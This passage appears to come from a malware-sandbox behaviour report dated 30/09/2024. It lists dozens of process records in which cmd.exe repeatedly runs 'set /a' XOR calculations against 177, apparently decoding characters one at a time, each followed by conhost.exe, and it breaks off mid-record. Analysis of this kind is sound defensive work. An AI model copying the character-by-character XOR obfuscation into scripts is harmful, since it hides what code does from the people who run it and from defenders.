                                                                                                                Target ID:56
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "157^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:57
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:58
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:59
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:60
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "216^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:61
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:62
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:63
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:64
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:65
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:66
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "201^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:67
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:68
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "137^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:69
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:70
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:71
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:72
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:73
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:74
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:75
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:76
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:77
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:78
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:79
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:80
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:81
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:82
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:83
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:84
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "157^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:85
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:86
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:87
                                                                                                                Start time:06:02:27
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:88
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "216^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:89
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:90
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:91
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:92
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:93
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:94
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "157^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:95
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:96
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:97
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:98
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "193^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:99
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:100
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:101
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:102
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:103
                                                                                                                Start time:06:02:28
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:104
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "157^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:105
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:106
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:107
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:108
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "216^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
